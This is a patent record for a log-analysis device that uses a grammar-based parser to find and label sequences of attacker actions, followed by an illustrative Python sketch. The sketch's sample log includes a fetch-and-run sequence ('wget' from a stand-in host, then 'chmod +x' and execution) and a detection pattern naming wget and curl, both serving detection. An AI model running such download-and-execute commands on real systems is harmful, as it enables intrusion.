US2021390178A1 · US · A1
| Field | Value |
|---|---|
| Publication number | US-2021390178-A1 |
| Application number | US-201917283552-A |
| Country | US |
| Kind code | A1 |
| Filing date | May 20, 2019 |
| Priority date | Oct 10, 2018 |
| Publication date | Dec 16, 2021 |
| Grant date | — |
Official abstract text for this publication.
An information processing device includes an element extraction unit that extracts elements relating to actions of an attacker from each input log, a generation unit that generates a parser based on definition information defining the actions of the attacker in a formal grammar, the parser detecting, from a log, a log string having a feature corresponding to an action defined by the definition information, a parsing unit that detects, from a log consisting of the elements extracted by the element extraction unit, log strings having features corresponding to the actions defined by the definition information by using the parser, and a reconstruction unit that reconstructs the log strings detected by the parsing unit, adds a label indicating an action defined by the definition information to each of the reconstructed log strings, and outputs the labeled log strings as a log corresponding to a series of actions of the attacker.
Opening claim text (preview).
1. An information processing device comprising: a memory; and a processor coupled to the memory and programmed to execute a process comprising: extracting elements relating to actions of an attacker from each input log; generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information; detecting, from a log consisting of the elements extracted by the extracting, log strings having features corresponding to the actions defined by the definition information by using the parser; and reconstructing the log strings detected by the detecting, add a label indicating an action defined by the definition information to each of the reconstructed log strings, and output the labeled log strings as a log corresponding to a series of actions of the attacker.

2. The information processing device of claim 1, wherein the definition information is described in a formal grammar dealing with an element as a terminal symbol.

3. The information processing device of claim 1, wherein the definition information includes information indicating an order of the actions of the attacker, and the reconstructing disposes the labeled log strings in the order indicated by the definition information and outputs the log as a log corresponding to a series of actions of the attacker.

4. A computer-readable recording medium having stored therein an analysis program for causing a computer to execute a process comprising: a step of extracting elements relating to actions of an attacker from each input log; a step of generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information; a step of detecting, from a log consisting of the elements extracted at the step of extracting the elements, log strings having features corresponding to the actions defined by the definition information by using the parser; and a step of reconstructing the log strings detected at the step of detecting the log strings, adding a label indicating an action defined by the definition information to each of the reconstructed log strings, and outputting the labeled log strings as a log corresponding to a series of actions of the attacker.
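
The pipeline described in the abstract and in claims 1 to 3 (extract elements, generate a parser from a grammar whose terminal symbols are those elements, detect matching log strings, then label and order them) can be sketched as follows. This is an added example, not code from the patent: the element rules, the three action names, the choice of a regular grammar compiled to a regular expression, and the sample log lines are all assumptions constructed for illustration.

```python
import re

# Constructed sample log lines (not from the patent).
SAMPLE_LOG = [
    "10:00:01 sshd: Failed password for root from 203.0.113.5",
    "10:00:02 sshd: Failed password for root from 203.0.113.5",
    "10:00:03 cron: job started",
    "10:00:04 sshd: Accepted password for root from 203.0.113.5",
    "10:00:09 bash: wget http://example.invalid/tool",
    "10:00:12 bash: chmod +x tool",
    "10:00:13 bash: ./tool",
]
# Hypothetical element rules: raw line -> one-letter terminal symbol.
ELEMENT_RULES = [("F", r"Failed password"), ("A", r"Accepted password"),
                 ("D", r"\b(wget|curl)\b"), ("X", r"chmod \+x"), ("R", r"bash: \./")]
# Hypothetical definition information: ordered actions as productions over terminals.
DEFINITION = [("brute_force_login", "F+A"), ("fetch_tool", "D"),
              ("execute_tool", "X?R")]

def extract_elements(lines):
    """Drop lines that match no rule; return [(symbol, line)] in log order."""
    out = []
    for line in lines:
        for sym, pat in ELEMENT_RULES:
            if re.search(pat, line):
                out.append((sym, line))
                break
    return out

def generate_parser(definition):
    """Compile the grammar: actions in the defined order, other elements may sit between."""
    return re.compile(".*?".join(f"(?P<{name}>{rhs})" for name, rhs in definition))

def parse_and_reconstruct(lines, definition=DEFINITION):
    """Return [(action_label, line)] for one detected series of actions, or []."""
    elements = extract_elements(lines)
    symbols = "".join(sym for sym, _ in elements)  # one char per element
    m = generate_parser(definition).search(symbols)
    if m is None:
        return []  # the ordered series of actions is not present
    labeled = []
    for name, _ in definition:
        start, end = m.span(name)  # string index == element index
        labeled += [(name, elements[i][1]) for i in range(start, end)]
    return labeled

if __name__ == "__main__":
    for label, line in parse_and_reconstruct(SAMPLE_LOG):
        print(f"{label:18} {line}")
```

Because every element is a single character, a match span in the symbol string maps directly back to the original log lines, which is what lets the labeled output keep the raw evidence for each action.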
involving long-term monitoring or reporting · CPC title
Test or assess a computer or a system · CPC title
Parsing · CPC title
Detecting local intrusion or implementing counter-measures · CPC title
Traffic logging, e.g. anomaly detection · CPC title